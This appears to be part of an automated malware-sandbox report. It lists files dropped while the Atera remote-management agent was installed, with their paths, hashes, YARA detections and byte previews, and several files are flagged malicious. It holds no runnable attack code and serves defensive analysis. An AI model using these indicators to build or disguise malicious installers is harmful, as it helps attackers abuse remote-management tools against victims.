                                                                                                                                                                                                                                                                                                                                  SHA-512:5F4BD28F2284DA96EEE715B9A30C5F0EEB778EFD4DE530F04E97476592E121E9BF9A33EF88CFE8BD0AEB19F48BC58EF4A47736C6AD4E96EE7979DF4703601D9D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\{B7C5EA94-B96A-41F5-BE95-25D78B486678}\ARPPRODUCTICON.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):454656
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.348929773767357
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:D7f8m8end5Xy+1kvI8k9W91iVXuXskIhT:/h8edk+1kv5K+WhT
                                                                                                                                                                                                                                                                                                                                  MD5:149336F319D9AE2CA49E49FC61E834AC
                                                                                                                                                                                                                                                                                                                                  SHA1:E00591F432E8B306A349D76BF280736E4509E49F
                                                                                                                                                                                                                                                                                                                                  SHA-256:9E06D2D011DA7F988CF974584BB9F2D780D2460DAE92B02FF13F50FC2B3ED2E8
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF7BC7C5FCD881C2A2E19914A0C3D765BED36D63C3FF0D60C07DA4CB8072F45DA3BC0DE7605BFE83B23E0572F1B700C0B613C049DC613F7470C095AE7EC9931D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............C...C...C...C...CD..C...C...C...C=..C...C...C...C...C...CRich...C........................PE..L......a.................@...................P....@.........................................................................4T..(........^...........................................................................P...............................text....5.......@.................. ..`.rdata.......P.......P..............@..@.data....)...`...0...`..............@....rsrc....^.......`..................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):432221
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.375173285661177
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaub:zTtbmkExhMJCIpErW
                                                                                                                                                                                                                                                                                                                                  MD5:0434FDFCB2AEEDA365B78C0449D5C6E5
                                                                                                                                                                                                                                                                                                                                  SHA1:9E70A12F956F1E4510CCF20C3ADF2FFE8574DE6C
                                                                                                                                                                                                                                                                                                                                  SHA-256:EB7E615EBCA7AA26CFF91080E6124BFBE9D1EA8D268AF7CC95487E70B97EC8F4
                                                                                                                                                                                                                                                                                                                                  SHA-512:E1E6548EB986E3205B9F6EFCE2D5CDBAA45FF775316DD5AE94C260CDF37205B531F5486B7904EDEA4BB0129084F1F0F3324D41CE44FB0178E669C27949571C1F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_90864756631514CEFBD0C1134238624E

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):727
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.566641767500083
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:5o6Tq9Kw5h44ToW37UtAwYL7Mjx8D2+CUxb9AsYKWlEiC0443gQiJiv0NQL:5yR7sAwYHMjxV+NJ9/HWlXC0zlGi0NQL
                                                                                                                                                                                                                                                                                                                                  MD5:A80AA2B8CDF2BC0C082A0C61B009622F
                                                                                                                                                                                                                                                                                                                                  SHA1:45BE3065696447A22DBDA31AE336AC80C043B96A
                                                                                                                                                                                                                                                                                                                                  SHA-256:97EC8BEA6C244C35FBAF979A39BF6238CBF6B599E9C53EB56D758A8A8E2773E2
                                                                                                                                                                                                                                                                                                                                  SHA-512:26AB8DCCCF68322769A64B00EFCC5939CE7494FE7B38824D572A0A03227CF86CE74578AEEF55A2B3A116DB1C94322FDE5A8F40ECB5D45BB2CAB889E0AAF48185
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0..........0.....+.....0......0...0......h7..;._....a{..e.NB..20241030154317Z0s0q0I0...+.........]....^Idk...NG.X....h7..;._....a{..e.NB.......`.< ._......20241030152702Z....20241106142702Z0...*.H...............w"..g...l.....e.....C.....2$........2...O#.t;8l...R.Z....1).w.../D....L3.u....U.v.w;_...J.tV..FOhM?..k.>...Lu.H....\c...n.D8.L.wSZa..M..Ib.............yx....JxU .$\.4.Q.y@.......#ag.j.....G.....!K.t........kp_.h...@....8.R.....t..tNu..|wZ..Y.G.&...)...._..F........H..#..r......Cl.aQz..^.Q.uP..2........vet2.2...kJ.QU..H*.ITk....3..44...F.......<.O.pV.h.{.?.R...e......T.<........L/:.4.{wB.S...6.9{.....O.."...y&["....[@.F1^yA..[.......q>q... U....G[[...-.........X/.$..'.......&..1D...5.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):727
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.583727811926715
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:5onfZNc5RlRtBfQDZszog95aoGPj+SxY/uvV/AUy1f0BOuIqU21yX1:5i3cdZMZS6JPqlu9/QfF21yl
                                                                                                                                                                                                                                                                                                                                  MD5:BCFD43B53A47B2DCF107EFDCBD0B59A4
                                                                                                                                                                                                                                                                                                                                  SHA1:75B548DF2AECB2DEC9A995C9FF974BE78959411A
                                                                                                                                                                                                                                                                                                                                  SHA-256:B0FA8FF8516C233400FF93675D5091C6747A19287D70C92C470FB30978868FA6
                                                                                                                                                                                                                                                                                                                                  SHA-512:F473CFEF0228F41B471E67AD3DBFE5715BA9AAB9EB541F27445DA87B8944BCD6A3560AB3E5E57A440F8A626B9137FDCD85AA2A50366F67EC61F478B4C7CEA634
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241029184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241029184215Z....20241105184215Z0...*.H..............3W?%g.4vZ:C....1....o...&,.....j^.......'<..../W._.....t./.@.....m...Q...W...a..].`......Le/.}.ndA.$......R]Pn....d5...A;.!Un...*e.x.V....,*G.x.........W7..w..r..m...uo...S....Z..z ...x..OMM......1T.......s.|.V.........ro....X......hF-..Y.^..@.@.....2-wZ..0.D!T......2N.G.......p.,~.@.A..8....kF.......t.;...@T.m......3vf......J.6.&./.l....Ex.@.......H..@..'.V9.....c.x.L;a.dm.u..b.p...,..<....g...9@..I\.....S?.~s?.s..H.SC..iB#...a....S*z`.Z..;..C.6....]ej.`B..<...n7h...A....L.QD.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_90864756631514CEFBD0C1134238624E

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):408
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9023346301359014
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:kK6CdG//wOfOAUMivhClroFHXHDZA6liyZlSlMul0bg3PWovy28lhlyG9ylpjyo4:kgOmxMiv8sF3HtllJZIvOP20Z8oF
                                                                                                                                                                                                                                                                                                                                  MD5:B29701DB4700867332FF130994DB054B
                                                                                                                                                                                                                                                                                                                                  SHA1:DBAC20A37116E351D42413AE0AB44FA453609B7C
                                                                                                                                                                                                                                                                                                                                  SHA-256:D8940ED4363891A4ADEE2EFC9F83ED9A8E7E08FEF0841FBC06D0398F2CA04379
                                                                                                                                                                                                                                                                                                                                  SHA-512:22113DD8E32DB6BAFCC9CCDCD7184A8369D17ED9A13D39469308FADE00783128D652C2F91DBA025C900EE2B0EE9B2555B6BA18EEFEB0B79B4B7405339EFF6FF5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:p...... ....$...vO.t.+..(..................*.*......W0......................W0.. ............+.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.c.c.8.p.W.v.3.e.y.M.Y.M.0.8.I.P.Z.f.5.%.2.F.0.%.3.D...

                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):412
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9740165899121087
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:kKMqjleaRIKQTKfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:kil3RmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                                                                                                  MD5:1DC66FD6B2F440347987B0864855B33F
                                                                                                                                                                                                                                                                                                                                  SHA1:3ADB0BA718DA960982C9A9A371B2F64BA831A475
                                                                                                                                                                                                                                                                                                                                  SHA-256:38DFC45BD2BC250D0DDF0A068308BA86CC411B217A566D8E5F1E08EC5C7BDFAE
                                                                                                                                                                                                                                                                                                                                  SHA-512:F6F26607574C71724070895B5AB470D1A8800FA8624D3AE4C2AE65BFCD2F9B834F07EE529459F3623B646E67C5A21B05D76BE1F3243CF5CF1E10BD9651D587E1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:p...... ....(...7..b.+..(..................F2*.....n./.....................n./.. .........#..+.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\InstallUtil.InstallLog

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):704
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.805280550692434
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:tIDRFK4mAX7RBem7hccD+PRem7hUhiiGNGNdg6MhgRBem7hccD+PRem7hUGNGNkm:Us43XVBVhcmMRVhMipNVeBVhcmMRVhro
                                                                                                                                                                                                                                                                                                                                  MD5:EF51E16A5B81AB912F2478FE0A0379D6
                                                                                                                                                                                                                                                                                                                                  SHA1:B0F9E2EE284DD1590EA31B2D3AD736D77B9FC6A7
                                                                                                                                                                                                                                                                                                                                  SHA-256:2C5D5397CEDF66DB724FED7FB4515B026A894F517A0DFBE8AE8ADF52DB61AA22
                                                                                                                                                                                                                                                                                                                                  SHA-512:296A11DB55BFEE7D87897BB63BC9E2C05786D3FD73A894DA5AF76F7A756495C6CCC0959C88844DFB5560DE2374A257201D960E004EC09D8C9DFB50952C5EF2D2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\System32\InstallUtil.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:...Running a transacted installation.....Beginning the Install phase of the installation...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Install phase completed successfully, and the Commit phase is beginning...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Commit phase completed successfully.....The transacted install has completed...

                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\SRCEF21.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):326664
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.273611352763876
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:gpWGtJblMMuWntMAHeVQHe3lPpAyQ4L/8mJEDJnMihRD+ae7/lXCU:tGtJblMMuWntyxOyQ4LkIyxypCU
                                                                                                                                                                                                                                                                                                                                  MD5:D2A501F07C9F9373F11CC89FB2D49D8C
                                                                                                                                                                                                                                                                                                                                  SHA1:37EAADAF61D2CBE697F1C454640F9E04F4CD2D16
                                                                                                                                                                                                                                                                                                                                  SHA-256:A25A7C80A4BD007248306E02FBC10436885C64CC70A40433143BC82C641D3480
                                                                                                                                                                                                                                                                                                                                  SHA-512:B20727B34287D5877D94963B08F520E586C2A66A39631C768CF2F6ACA31959DFB2711C8043E71DA4FA8A00DF039E886D30B0D7DC2E85FEFC68E99761F3945B54
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..............].......j.......j.......j...............j.......j.......j...............j......Rich....................PE..d......e.........." ................<........................................@............@..........................................p..w....^....... ...........6.......(...0...... ...................................................(............................text...>~.......................... ..`.rdata..G...........................@..@.data....[.......&...f..............@....pdata...6.......8..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):471
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.163915636596036
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:J0MgYPq9I3t5o7UmhVPqn1qqfuJfkEnFI4ykZKj7sBtAQwmdualsSy7v9FLdO/i2:JyYOI3t5GLsHIfZIey9mduzSyRxI/rP
                                                                                                                                                                                                                                                                                                                                  MD5:9368F227F2D233BECEECDC39F7DCF10C
                                                                                                                                                                                                                                                                                                                                  SHA1:C411AC59670511A71D58E4146A390C9E517FC522
                                                                                                                                                                                                                                                                                                                                  SHA-256:89FEC915186F771EA75E806B37951B415A87D9091BAE6C503F045092254A9705
                                                                                                                                                                                                                                                                                                                                  SHA-512:6C01018D4B434CC4549DAE4238DF31871721174C22E4CACECF365F259AB5E22800823E741BD4F07073A7BF6D4A4A85A8AF8FBFDD8157F06A6C7D59B46E9B53C6
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0..........0.....+.....0......0...0......E....1-Q...!..m....20241029165849Z0s0q0I0...+...........@..D3=?..Mn8...Q..E....1-Q...!..m..........-...P..@.Z....20241029165849Z....20241105165849Z0...*.H................5...6k.j..m..$...(y..~.?9M..}...O.bD..;.]i4...F.....;..f..(...../+R8.v}.z/2.;....^.>5f.Z..-!!..\NW.%:...8K........[]n.Q.......7..(.9.s...._.m...*(..?@..-........^2.0.s.g.....+..`.tL.p.u..#...j/.Q...-A....../..5..%.S0k~.d.g...........

                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):727
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.5240144682942764
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:5o6Tq9h5h44TUqPq3F7XGbcXQOD8qzIzQf7KjLdQkimJFWRQVi1x+h9eZNjsWsU+:5Ioqu8bXCKjL5JFE8aCezCyU
                                                                                                                                                                                                                                                                                                                                  MD5:EDB4E3317B95E16A448B0CD9282AE23A
                                                                                                                                                                                                                                                                                                                                  SHA1:0F6E826BD5C7C642334855AA206DA5038F29EEEF
                                                                                                                                                                                                                                                                                                                                  SHA-256:BB75EEB18BDA565003475DE62EF5C37CA005D2809C0DA6FDCDEB82C07B6A71FF
                                                                                                                                                                                                                                                                                                                                  SHA-512:4E353AB569B7A5177F776584EBD28E70CBA33ACB6589FC4BC1F698FCD9B4C5EDC16AB0E770C3C3E98833928FF5F407C953E9609176C3CC0B16B10CF0FAE1557F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0..........0.....+.....0......0...0......h7..;._....a{..e.NB..20241030203707Z0s0q0I0...+.........]....^Idk...NG.X....h7..;._....a{..e.NB...(I.x...#...R....20241030202102Z....20241106192102Z0...*.H.............s.*F.m:.]......j].}..yu.D*.z..l......g..A..[...Z8i....O{.....&..V..z..](I..../L..('..dn...R.=D..\......~.!....N......G..s.t.]...Jd.].H...D..kUq..o.....T(.D.}I.....A.)*.{..b.l..p....f.....K[..V.ss........L.i.c.@.Y. r2.p.Sw\....].fs(D....<J.+....=...%...L.{_=./..v.R.CCN..#....ixs'4I2..'.N\./....L.H.................M3..Y."?4j].L~.S.nF..{.&RE.......b..k5F.........,.5+..OZD9.O.h).F.-...~.........M...DGX.....*UD9.pvd....m.PO...m..?.L..N..?N....mZ.p.1.n..G8..F..o.T0 ..........LF.....U

                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1716
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                                                                                                  MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                                                                                                  SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                                                                                                  SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                                                                                                  SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):727
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.583727811926715
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:5onfZNc5RlRtBfQDZszog95aoGPj+SxY/uvV/AUy1f0BOuIqU21yX1:5i3cdZMZS6JPqlu9/QfF21yl
                                                                                                                                                                                                                                                                                                                                  MD5:BCFD43B53A47B2DCF107EFDCBD0B59A4
                                                                                                                                                                                                                                                                                                                                  SHA1:75B548DF2AECB2DEC9A995C9FF974BE78959411A
                                                                                                                                                                                                                                                                                                                                  SHA-256:B0FA8FF8516C233400FF93675D5091C6747A19287D70C92C470FB30978868FA6
                                                                                                                                                                                                                                                                                                                                  SHA-512:F473CFEF0228F41B471E67AD3DBFE5715BA9AAB9EB541F27445DA87B8944BCD6A3560AB3E5E57A440F8A626B9137FDCD85AA2A50366F67EC61F478B4C7CEA634
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241029184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241029184215Z....20241105184215Z0...*.H..............3W?%g.4vZ:C....1....o...&,.....j^.......'<..../W._.....t./.@.....m...Q...W...a..].`......Le/.}.ndA.$......R]Pn....d5...A;.!Un...*e.x.V....,*G.x.........W7..w..r..m...uo...S....Z..z ...x..OMM......1T.......s.|.V.........ro....X......hF-..Y.^..@.@.....2-wZ..0.D!T......2N.G.......p.,~.@.A..8....kF.......t.;...@T.m......3vf......J.6.&./.l....Ex.@.......H..@..'.V9.....c.x.L;a.dm.u..b.p...,..<....g...9@..I\.....S?.~s?.s..H.SC..iB#...a....S*z`.Z..;..C.6....]ej.`B..<...n7h...A....L.QD.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1428
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.688784034406474
